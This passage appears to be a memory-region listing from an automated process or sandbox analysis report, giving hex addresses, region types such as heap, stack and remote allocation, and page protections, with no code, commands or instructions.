page read and write
165BC7D000
stack
page read and write
84FB4FD000
stack
page read and write
13135926000
heap
page execute and read and write
7FFD9B79B000
trusted library allocation
page read and write
21CEFAC3000
heap
page read and write
1DBF80B6000
heap
page read and write
2905D657000
heap
page read and write
1E09E7E000
stack
page read and write
155AB0CC000
heap
page read and write
A051FE000
stack
page read and write
7FFD9B912000
trusted library allocation
page read and write
F5D7CE000
stack
page read and write
7FFD9B965000
trusted library allocation
page read and write
16891BE8000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
C7B37F000
stack
page read and write
20FEA050000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
24E81B00000
heap
page execute and read and write
7FFD9B9C0000
trusted library allocation
page read and write
CBC000
stack
page read and write
1B993E0D000
trusted library allocation
page read and write
20FEC170000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
7FFD9B910000
trusted library allocation
page execute and read and write
10C0000
heap
page read and write
7FFD9B770000
trusted library allocation
page read and write
16893690000
heap
page execute and read and write
23A52E93000
heap
page read and write
290774C4000
heap
page read and write
5951AFE000
stack
page read and write
29B1A480000
heap
page read and write
2905EF4F000
heap
page read and write
7FFD9B840000
trusted library allocation
page read and write
A04AFF000
stack
page read and write
1E0AD4E000
stack
page read and write
D22B77E000
stack
page read and write
23A3A8E0000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
20FEA0D8000
heap
page read and write
20FEC470000
heap
page read and write
155C529B000
heap
page read and write
20FEC253000
heap
page read and write
7FFD9B942000
trusted library allocation
page read and write
D32E4FF000
stack
page read and write
1EA3D130000
heap
page read and write
120A6B92000
heap
page read and write
16E6D918000
heap
page read and write
1C2808D5000
heap
page read and write
1CC000
stack
page read and write
155AD310000
trusted library allocation
page read and write
1C292830000
trusted library allocation
page read and write
BB4593B000
stack
page read and write
4459883000
stack
page read and write
59516FD000
stack
page read and write
7FFD9B856000
trusted library allocation
page execute and read and write
7FFD9B826000
trusted library allocation
page read and write
20FEA158000
heap
page read and write
F5DD7E000
stack
page read and write
2409995F000
heap
page read and write
155AB34B000
heap
page read and write
23A38E60000
heap
page read and write
1AFAF6A1000
heap
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
29B32921000
heap
page read and write
7FFD9B962000
trusted library allocation
page read and write
1EA3EFE6000
trusted library allocation
page read and write
290774C6000
heap
page read and write
1AFAD6F6000
heap
page read and write
2102EA15000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
23A38D67000
heap
page read and write
13CE87F000
stack
page read and write
13CE97D000
stack
page read and write
7FFD9BA90000
trusted library allocation
page read and write
1C2828A8000
trusted library allocation
page read and write
21CEFA9D000
heap
page read and write
16E6FA74000
heap
page read and write
7FFD9B941000
trusted library allocation
page read and write
1E0A17E000
stack
page read and write
595177E000
stack
page read and write
1208EBF2000
trusted library allocation
page read and write
23A3B325000
trusted library allocation
page read and write
2102CFB0000
heap
page read and write
7FFD9B800000
trusted library allocation
page read and write
1AFAF917000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
1C29A968000
heap
page read and write
1EA3EE71000
heap
page read and write
21CED870000
heap
page read and write
2216E9C3000
heap
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
7FFD9BAAC000
trusted library allocation
page read and write
155AB0AC000
heap
page read and write
595131F000
stack
page read and write
29B32A40000
heap
page execute and read and write
23A3AD32000
trusted library allocation
page read and write
21CED9BD000
heap
page read and write
1208CABE000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
1C2807E0000
heap
page read and write
20FEC225000
heap
page read and write
1208CB23000
heap
page read and write
1311D270000
heap
page execute and read and write
7FFD9B902000
trusted library allocation
page read and write
16E10072000
trusted library allocation
page read and write
1EA3EFEA000
trusted library allocation
page read and write
20FEC1BF000
heap
page read and write
120A6B50000
heap
page read and write
23A38D7B000
heap
page read and write
13135891000
heap
page read and write
13CEA7E000
stack
page read and write
7FFD9BA80000
trusted library allocation
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
8FC000
stack
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
24E9A00A000
heap
page read and write
155C5046000
heap
page execute and read and write
13CEB79000
stack
page read and write
E5F82FF000
stack
page read and write
7FFD9B999000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
29B1BCF1000
trusted library allocation
page read and write
155C5190000
heap
page read and write
13CE58F000
stack
page read and write
23A3B32E000
trusted library allocation
page read and write
7FFD9B890000
trusted library allocation
page execute and read and write
24099A8A000
heap
page read and write
2102E931000
trusted library allocation
page read and write
2216C8BB000
heap
page read and write
5951B7E000
stack
page read and write
1208E773000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
16E0047C000
trusted library allocation
page read and write
BB4537D000
stack
page read and write
23A3B557000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
21CED840000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
1C29AA1B000
heap
page read and write
21CEFAA3000
heap
page read and write
29B32A47000
heap
page execute and read and write
7FFD9BA31000
trusted library allocation
page read and write
7FFD9B780000
trusted library allocation
page read and write
16E6F2B0000
heap
page read and write
29B1A858000
trusted library allocation
page read and write
7FFD9B770000
trusted library allocation
page read and write
16E6FA42000
heap
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
1AFAD6F5000
heap
page read and write
2216EA31000
heap
page read and write
F5DCFE000
stack
page read and write
1311B860000
trusted library allocation
page read and write
24E81B41000
trusted library allocation
page read and write
BB456BE000
stack
page read and write
E5F81FE000
stack
page read and write
1257000
heap
page read and write
21047100000
heap
page read and write
7FFD9B870000
trusted library allocation
page execute and read and write
2102E967000
trusted library allocation
page read and write
1AFAF711000
heap
page read and write
155BCCA2000
trusted library allocation
page read and write
2102E9A4000
trusted library allocation
page read and write
2102F353000
trusted library allocation
page read and write
2216EA30000
heap
page read and write
C7C20F000
stack
page read and write
7FFD9B960000
trusted library allocation
page execute and read and write
5B0F1FF000
stack
page read and write
7FFD9B931000
trusted library allocation
page read and write
445A1FE000
stack
page read and write
7FFD9BA73000
trusted library allocation
page read and write
2216E930000
heap
page read and write
D32EBFC000
stack
page read and write
23A52E60000
heap
page execute and read and write
A04FF7000
stack
page read and write
29B32BF1000
heap
page read and write
2216E9C3000
heap
page read and write
29060F32000
trusted library allocation
page read and write
24E9A000000
heap
page read and write
29077470000
heap
page execute and read and write
13CECF8000
stack
page read and write
155BCC31000
trusted library allocation
page read and write
168A371C000
trusted library allocation
page read and write
29077730000
heap
page execute and read and write
1C280AA0000
trusted library allocation
page read and write
2103E992000
trusted library allocation
page read and write
1B991CD2000
heap
page read and write
1EA3F4A1000
trusted library allocation
page read and write
7FFD9B840000
trusted library allocation
page read and write
2102CC60000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
7FFD9B866000
trusted library allocation
page execute and read and write
1208CC90000
heap
page read and write
D22B17F000
stack
page read and write
23A3A861000
trusted library allocation
page read and write
445A27B000
stack
page read and write
7FFD9B77B000
trusted library allocation
page read and write
1C280982000
heap
page read and write
1DBF8065000
heap
page read and write
2216C838000
heap
page read and write
930000
heap
page read and write
23A4A870000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
1C282932000
trusted library allocation
page read and write
16893650000
heap
page execute and read and write
1B9ABDAC000
heap
page read and write
23A3B593000
trusted library allocation
page read and write
1B9A3939000
trusted library allocation
page read and write
16E10011000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
20FEBB50000
trusted library allocation
page read and write
7FFD9B846000
trusted library allocation
page read and write
7FFD9B77B000
trusted library allocation
page read and write
1208CAA8000
heap
page read and write
2905FFF1000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
20F90070000
trusted library allocation
page read and write
1C29A9D1000
heap
page read and write
1AFAF91A000
heap
page read and write
23A3B304000
trusted library allocation
page read and write
D32E57E000
stack
page read and write
1EA3F357000
trusted library allocation
page read and write
1EA57370000
heap
page read and write
1AFAD6E8000
heap
page read and write
1AFAF919000
heap
page read and write
1B9943C7000
trusted library allocation
page read and write
20F81C03000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
7FFD9B995000
trusted library allocation
page read and write
1B991ED5000
heap
page read and write
2103E933000
trusted library allocation
page read and write
16E6F300000
trusted library allocation
page read and write
29B1A6B1000
trusted library allocation
page read and write
20FEC1C5000
heap
page read and write
D32EB7E000
stack
page read and write
BB4527F000
stack
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
155C5290000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
7FFD9B7DC000
trusted library allocation
page execute and read and write
4459DFF000
stack
page read and write
24EFFEB4000
heap
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
7FFD9B9F0000
trusted library allocation
page read and write
1EA3EFA1000
trusted library allocation
page read and write
24EFFEC0000
heap
page read and write
1090000
heap
page read and write
23A3B53D000
trusted library allocation
page read and write
16E6FA79000
heap
page read and write
23A52FB2000
heap
page read and write
120A6B79000
heap
page read and write
53E15FE000
stack
page read and write
7FFD9B810000
trusted library allocation
page read and write
16E6FAC0000
heap
page read and write
1B991EF0000
trusted library allocation
page read and write
7FFD9B870000
trusted library allocation
page execute and read and write
1C28291A000
trusted library allocation
page read and write
20F81B3A000
trusted library allocation
page read and write
F5DFFE000
stack
page read and write
7FFD9B94A000
trusted library allocation
page read and write
29B1BABA000
trusted library allocation
page read and write
C7B6BF000
stack
page read and write
29B189FA000
heap
page read and write
13135808000
heap
page read and write
16891D90000
heap
page readonly
E0938F7000
stack
page read and write
7FFD9B970000
trusted library allocation
page read and write
23A3A850000
heap
page read and write
1070000
heap
page read and write
1AFAD600000
heap
page read and write
2216E632000
heap
page read and write
23A38D5D000
heap
page read and write
16891DB0000
heap
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
7FFD9BAC0000
trusted library allocation
page read and write
1311D200000
heap
page execute and read and write
7FFD9B990000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
7FFD9B774000
trusted library allocation
page read and write
595167E000
stack
page read and write
1C282821000
trusted library allocation
page read and write
B51D87D000
stack
page read and write
920000
heap
page read and write
1DBF8000000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
7FFD9B952000
trusted library allocation
page read and write
29B18A35000
heap
page read and write
7FFD9B950000
trusted library allocation
page read and write
E093AFD000
stack
page read and write
1AFAD76B000
heap
page read and write
23A3ABF1000
trusted library allocation
page read and write
1B9ABCD0000
heap
page execute and read and write
7FFD9BAA0000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
290774B0000
heap
page read and write
16891E55000
heap
page read and write
29B189B0000
heap
page read and write
2216E9B3000
heap
page read and write
3BAE000
stack
page read and write
155AB260000
trusted library allocation
page read and write
20FEC24A000
heap
page read and write
5951977000
stack
page read and write
2102CD9E000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
2905D610000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
24E99F06000
heap
page read and write
C7B073000
stack
page read and write
1208E6F0000
heap
page execute and read and write
168ABEEF000
heap
page read and write
155BCC40000
trusted library allocation
page read and write
2102CF20000
heap
page readonly
293CCC3000
stack
page read and write
7FFD9B866000
trusted library allocation
page execute and read and write
7FFD9B9E0000
trusted library allocation
page read and write
155ACC7E000
trusted library allocation
page read and write
16E6D995000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
1B993E47000
trusted library allocation
page read and write
21CEF8A1000
heap
page read and write
474000
remote allocation
page execute and read and write
9ED70FE000
stack
page read and write
1311D4B1000
trusted library allocation
page read and write
1EA3EE30000
heap
page read and write
165BCFE000
stack
page read and write
7FFD9BA00000
trusted library allocation
page read and write
16894ED3000
trusted library allocation
page read and write
1EA3D1A5000
heap
page read and write
1208CCB0000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
24E81990000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
2102E97D000
trusted library allocation
page read and write
5951BFF000
stack
page read and write
1B993C8E000
trusted library allocation
page read and write
59518F8000
stack
page read and write
293D33E000
stack
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
23A3ABED000
trusted library allocation
page read and write
1B9ABE00000
heap
page read and write
23A3B597000
trusted library allocation
page read and write
2906F430000
trusted library allocation
page read and write
2905EF03000
trusted library allocation
page read and write
23A52CB0000
heap
page read and write
165BBFE000
stack
page read and write
24E824A8000
trusted library allocation
page read and write
155AB340000
heap
page read and write
2216E69D000
heap
page read and write
1EA3EF30000
heap
page execute and read and write
7FFD9B9E0000
trusted library allocation
page read and write
7FFD9B783000
trusted library allocation
page execute and read and write
20F80075000
trusted library allocation
page read and write
7FFD9B902000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1C29AA50000
heap
page read and write
7FFD9B836000
trusted library allocation
page execute and read and write
F5DBFD000
stack
page read and write
2102EA1B000
trusted library allocation
page read and write
1B991CD8000
heap
page read and write
2216E9F3000
heap
page read and write
1EA3D540000
heap
page read and write
B51E80F000
stack
page read and write
B51DABE000
stack
page read and write
20F90001000
trusted library allocation
page read and write
2216C821000
heap
page read and write
24E81C27000
trusted library allocation
page read and write
7FFD9B900000
trusted library allocation
page read and write
7FFD9B901000
trusted library allocation
page read and write
23A38F40000
heap
page read and write
23A52DC0000
heap
page execute and read and write
1274000
heap
page read and write
2102CEF0000
trusted library allocation
page read and write
20FEC4BD000
heap
page read and write
2216E9A4000
heap
page read and write
7FFD9B9FA000
trusted library allocation
page read and write
7FFD9B83C000
trusted library allocation
page execute and read and write
29077940000
heap
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
2102CF10000
trusted library allocation
page read and write
F5DE77000
stack
page read and write
24E99F31000
heap
page read and write
29B1A95B000
trusted library allocation
page read and write
E0934FE000
stack
page read and write
128A000
heap
page read and write
23A38DA2000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
7FFD9B773000
trusted library allocation
page execute and read and write
7FFD9B980000
trusted library allocation
page read and write
2102CD40000
heap
page read and write
155ACD22000
trusted library allocation
page read and write
1EA3EFC3000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
1C29A930000
heap
page read and write
29B18890000
heap
page read and write
20FEA12D000
heap
page read and write
7FFD9B911000
trusted library allocation
page read and write
1B9ABCD7000
heap
page execute and read and write
21CEF79E000
heap
page read and write
1209E7C2000
trusted library allocation
page read and write
5951A7B000
stack
page read and write
13CEDFE000
stack
page read and write
7FFD9B990000
trusted library allocation
page read and write
1208CB80000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
1C2808AE000
heap
page read and write
29077976000
heap
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
7FFD9BA50000
trusted library allocation
page read and write
29B1A330000
trusted library allocation
page read and write
23A52D09000
heap
page read and write
29B32AE0000
heap
page read and write
1AFAF711000
heap
page read and write
1B9AC002000
heap
page read and write
155AB070000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
1C280890000
heap
page read and write
7FFD9BA4E000
trusted library allocation
page read and write
1B9ABD96000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
7FFD9B7BC000
trusted library allocation
page execute and read and write
1208E841000
trusted library allocation
page read and write
2216E632000
heap
page read and write
21CEDC00000
heap
page read and write
670000
heap
page read and write
7FFD9B949000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
7FFD9B840000
trusted library allocation
page execute and read and write
165C1BE000
stack
page read and write
155AD0D2000
trusted library allocation
page read and write
5A0000
heap
page read and write
1EA3D1BC000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
7FFD9B92A000
trusted library allocation
page read and write
24E8201E000
trusted library allocation
page read and write
293CDCF000
stack
page read and write
1B991ED0000
heap
page read and write
23A38EA0000
trusted library allocation
page read and write
1B9ABEF0000
heap
page execute and read and write
7FFD9B816000
trusted library allocation
page read and write
131358B7000
heap
page read and write
23A38E20000
heap
page read and write
E5F7BFE000
stack
page read and write
1C280A80000
trusted library allocation
page read and write
20F80001000
trusted library allocation
page read and write
1EA3F0F3000
trusted library allocation
page read and write
7FFD9B830000
trusted library allocation
page execute and read and write
7FFD9B8F2000
trusted library allocation
page read and write
21CEFAC3000
heap
page read and write
20F81BFF000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
240998A0000
heap
page read and write
16E6D9E8000
heap
page read and write
155AB0F4000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
240998F8000
heap
page read and write
16E6D958000
heap
page read and write
2905F070000
heap
page read and write
13CEEFB000
stack
page read and write
7FFD9BA20000
trusted library allocation
page read and write
13135885000
heap
page read and write
D22ADDE000
stack
page read and write
16894AF5000
trusted library allocation
page read and write
16E00001000
trusted library allocation
page read and write
23A38F80000
trusted library allocation
page read and write
1208E854000
trusted library allocation
page read and write
293D3B6000
stack
page read and write
16E004FE000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1312D371000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page read and write
1AFAF5A2000
heap
page read and write
3A6E000
stack
page read and write
7FFD9B763000
trusted library allocation
page execute and read and write
24EFFAE0000
heap
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
2905EEB0000
trusted library allocation
page read and write
7FFD9B911000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
168938CB000
trusted library allocation
page read and write
1208CAA0000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
20FEBD2E000
heap
page read and write
1C280810000
heap
page read and write
1C282968000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
1AFAD6FE000
heap
page read and write
1311DA2B000
trusted library allocation
page read and write
20FEBD15000
heap
page read and write
1311D360000
heap
page read and write
7FFD9B770000
trusted library allocation
page read and write
13CE503000
stack
page read and write
7FFD9B922000
trusted library allocation
page read and write
16E00A31000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
1C280B54000
heap
page read and write
1EA3EC00000
trusted library allocation
page read and write
7FFD9B764000
trusted library allocation
page read and write
2216C9B5000
heap
page read and write
1EA3D203000
heap
page read and write
1B9AC013000
heap
page read and write
7FFD9BA1F000
trusted library allocation
page read and write
2216E1F0000
heap
page read and write
1B993900000
heap
page execute and read and write
29B1A332000
trusted library allocation
page read and write
16E6F9DF000
heap
page read and write
23A38E1A000
heap
page read and write
7FFD9B79B000
trusted library allocation
page read and write
1311D381000
trusted library allocation
page read and write
23A3B32A000
trusted library allocation
page read and write
16E6DC85000
heap
page read and write
7FFD9B840000
trusted library allocation
page execute and read and write
20FEBB53000
trusted library allocation
page read and write
29077476000
heap
page execute and read and write
7FFD9BA50000
trusted library allocation
page read and write
20FEA111000
heap
page read and write
7FFD9B770000
trusted library allocation
page read and write
7FFD9B955000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
1EA3D530000
trusted library allocation
page read and write
C7B0FF000
stack
page read and write
E5F7EFE000
stack
page read and write
24E82069000
trusted library allocation
page read and write
474000
remote allocation
page execute and read and write
120A6B40000
heap
page execute and read and write
7FFD9B970000
trusted library allocation
page execute and read and write
2216E731000
heap
page read and write
1E0A1FE000
stack
page read and write
21CED93B000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
29B1BAC6000
trusted library allocation
page read and write
7FFD9B932000
trusted library allocation
page read and write
16E6F9A0000
heap
page read and write
2216E9A9000
heap
page read and write
29B1A380000
heap
page read and write
1B991CEE000
heap
page read and write
13CEE7E000
stack
page read and write
2216C845000
heap
page read and write
155C5500000
heap
page read and write
7FFD9B760000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1208CAE6000
heap
page read and write
16E6D950000
heap
page read and write
23A3AA8B000
trusted library allocation
page read and write
1AFAF927000
heap
page read and write
1E09F7E000
stack
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
2216E9AA000
heap
page read and write
20FEC370000
heap
page read and write
C7B479000
stack
page read and write
A04EFE000
stack
page read and write
21CEF736000
heap
page read and write
1E099FF000
stack
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
D22B6FE000
stack
page read and write
120A6B98000
heap
page read and write
1E09FF9000
stack
page read and write
7FFD9B990000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
5AC000
stack
page read and write
1EA57580000
heap
page read and write
1208CDC0000
heap
page read and write
23A38FC5000
heap
page read and write
24E99D30000
heap
page execute and read and write
21CEF732000
heap
page read and write
1C282980000
trusted library allocation
page read and write
13CEC7C000
stack
page read and write
7FFD9B80C000
trusted library allocation
page execute and read and write
7FFD9BAA0000
trusted library allocation
page read and write
1AFAD6E9000
heap
page read and write
2102CFA0000
trusted library allocation
page read and write
24EFFB6C000
heap
page read and write
E09367E000
stack
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
293D2F9000
stack
page read and write
2102F526000
trusted library allocation
page read and write
21CED939000
heap
page read and write
29077553000
heap
page read and write
7FFD9B980000
trusted library allocation
page execute and read and write
2E2B000
stack
page read and write
21CED850000
heap
page read and write
29B1A370000
trusted library allocation
page read and write
1AFAF90E000
heap
page read and write
1EA3EE76000
heap
page read and write
29077480000
heap
page read and write
7FFD9B83C000
trusted library allocation
page execute and read and write
1AFAF96A000
heap
page read and write
9ED69BF000
stack
page read and write
16E6F320000
trusted library allocation
page read and write
155ACD78000
trusted library allocation
page read and write
2216C84E000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
16E6F9EA000
heap
page read and write
D32E1B3000
stack
page read and write
1C29A9B6000
heap
page read and write
A04BFF000
stack
page read and write
2102EA5D000
trusted library allocation
page read and write
7FFD9B941000
trusted library allocation
page read and write
7FFD9B78B000
trusted library allocation
page read and write
2905D651000
heap
page read and write
1311D18A000
heap
page read and write
7FFD9B969000
trusted library allocation
page read and write
1B9943D6000
trusted library allocation
page read and write
21CEFAB3000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
1208CC95000
heap
page read and write
165BDFE000
stack
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
7FFD9B753000
trusted library allocation
page execute and read and write
7FFD9B784000
trusted library allocation
page read and write
29060C76000
trusted library allocation
page read and write
30ED000
stack
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
2905D440000
heap
page read and write
13CF9CD000
stack
page read and write
1AFAD76B000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
7FFD9B77B000
trusted library allocation
page read and write
21047114000
heap
page read and write
1EA3EE36000
heap
page read and write
1311D3AC000
trusted library allocation
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
595274D000
stack
page read and write
7FFD9B830000
trusted library allocation
page read and write
1C282C80000
trusted library allocation
page read and write
1209E760000
trusted library allocation
page read and write
24E81F88000
trusted library allocation
page read and write
165BB3E000
stack
page read and write
2102CEE0000
heap
page read and write
1B9ABFC0000
heap
page read and write
13CE5CE000
stack
page read and write
D22B27D000
stack
page read and write
24E81F84000
trusted library allocation
page read and write
1C282831000
trusted library allocation
page read and write
1312D380000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
53E12FF000
stack
page read and write
C7B83B000
stack
page read and write
1208CCD0000
trusted library allocation
page read and write
7FFD9BA83000
trusted library allocation
page read and write
7FFD9B783000
trusted library allocation
page execute and read and write
D22B579000
stack
page read and write
7FFD9B79B000
trusted library allocation
page read and write
B51D6FF000
unkown
page read and write
84FAFFF000
stack
page read and write
7FFD9BA30000
trusted library allocation
page read and write
D32E77E000
stack
page read and write
7FFD9BA70000
trusted library allocation
page read and write
1E09CFF000
stack
page read and write
1C29AE50000
heap
page read and write
7FFD9B921000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
29077950000
heap
page read and write
16894EFF000
trusted library allocation
page read and write
168ABC90000
heap
page read and write
16891C64000
heap
page read and write
7FFD9B784000
trusted library allocation
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
7FFD9B922000
trusted library allocation
page read and write
2906F3D1000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
7FFD9B942000
trusted library allocation
page read and write
1311D463000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
29B1BACA000
trusted library allocation
page read and write
D32E67E000
stack
page read and write
24E81C2A000
trusted library allocation
page read and write
1B991F00000
heap
page readonly
155AAFD0000
heap
page read and write
24EFFBB7000
heap
page read and write
16E00141000
trusted library allocation
page read and write
7FFD9B774000
trusted library allocation
page read and write
290608B5000
trusted library allocation
page read and write
24E819B0000
trusted library allocation
page read and write
1E099B3000
stack
page read and write
24EFFB30000
heap
page read and write
59513DF000
stack
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
29B328E0000
heap
page read and write
59517FE000
stack
page read and write
2905F43C000
trusted library allocation
page read and write
1C280918000
heap
page read and write
16E00458000
trusted library allocation
page read and write
131357C0000
heap
page read and write
1C280985000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
2216E636000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
7FFD9BA28000
trusted library allocation
page read and write
7FFD9B911000
trusted library allocation
page read and write
24099927000
heap
page read and write
24099A80000
heap
page read and write
23A52E90000
heap
page read and write
24E819A0000
heap
page readonly
23A52D1F000
heap
page read and write
BB455BE000
stack
page read and write
B51D7FE000
stack
page read and write
7FFD9B9B1000
trusted library allocation
page read and write
5B0F9FB000
stack
page read and write
E0936FE000
stack
page read and write
E5F7DFF000
stack
page read and write
24EFFB74000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
20F901B2000
trusted library allocation
page read and write
24E99ED2000
heap
page read and write
7FFD9B959000
trusted library allocation
page read and write
1C28285C000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
1EA3F0FD000
trusted library allocation
page read and write
21047118000
heap
page read and write
7FFD9B9C2000
trusted library allocation
page read and write
1DBF806E000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
29B32496000
heap
page read and write
155AD2D9000
trusted library allocation
page read and write
2216E9A6000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
21CEFAA4000
heap
page read and write
240997A0000
heap
page read and write
7FFD9B82C000
trusted library allocation
page execute and read and write
16894F5A000
trusted library allocation
page read and write
20FEA113000
heap
page read and write
7FFD9B773000
trusted library allocation
page execute and read and write
1311B7E8000
heap
page read and write
29060CB1000
trusted library allocation
page read and write
9ED6C7F000
stack
page read and write
131357C9000
heap
page read and write
E093A7E000
stack
page read and write
21CED9BD000
heap
page read and write
1EA3D205000
heap
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
7FFD9B792000
trusted library allocation
page read and write
21046E50000
heap
page read and write
2102F2BD000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
13CF94E000
stack
page read and write
16894AEB000
trusted library allocation
page read and write
13CF8CF000
stack
page read and write
7FFD9BA40000
trusted library allocation
page read and write
7FFD9B921000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
23A38ED0000
heap
page readonly
D32E7F8000
stack
page read and write
155ACD2D000
trusted library allocation
page read and write
2E6C000
stack
page read and write
120A6F40000
heap
page read and write
155C5298000
heap
page read and write
1C282CFB000
trusted library allocation
page read and write
1208CADC000
heap
page read and write
F5DDF8000
stack
page read and write
23A3B618000
trusted library allocation
page read and write
20FEA375000
heap
page read and write
23A4A889000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
2102EDC3000
trusted library allocation
page read and write
2103E953000
trusted library allocation
page read and write
D32E877000
stack
page read and write
165CC0F000
stack
page read and write
E093BFE000
stack
page read and write
5951C7B000
stack
page read and write
23A38D63000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
1EA3F0AE000
trusted library allocation
page read and write
2216E9A5000
heap
page read and write
445994E000
unkown
page read and write
23A52D80000
heap
page read and write
155ACF87000
trusted library allocation
page read and write
23A3B308000
trusted library allocation
page read and write
155BCC44000
trusted library allocation
page read and write
29B1BFF7000
trusted library allocation
page read and write
2102EE20000
trusted library allocation
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
20FEA10C000
heap
page read and write
D32E8FE000
stack
page read and write
16E6D94C000
heap
page read and write
9ED71FC000
stack
page read and write
474000
remote allocation
page execute and read and write
13CED7E000
stack
page read and write
16891E5E000
heap
page read and write
2216E99E000
heap
page read and write
1C282810000
heap
page read and write
29B32BEC000
heap
page read and write
165BAFE000
stack
page read and write
24E81BB2000
trusted library allocation
page read and write
155ACC58000
trusted library allocation
page read and write
84FB5FE000
stack
page read and write
7FFD9B9A8000
trusted library allocation
page read and write
2102EA13000
trusted library allocation
page read and write
13135806000
heap
page read and write
16E6D993000
heap
page read and write
293E08E000
stack
page read and write
7FFD9B79B000
trusted library allocation
page read and write
1C282D0F000
trusted library allocation
page read and write
1DBF8123000
heap
page read and write
21046E26000
heap
page execute and read and write
24099A85000
heap
page read and write
F5EBCE000
stack
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
1EA3D120000
heap
page read and write
29060C58000
trusted library allocation
page read and write
CC000
stack
page read and write
1EA3D1DC000
heap
page read and write
7FFD9B75D000
trusted library allocation
page execute and read and write
1C282D58000
trusted library allocation
page read and write
2216C846000
heap
page read and write
168ABBA3000
heap
page read and write
2906F3C1000
trusted library allocation
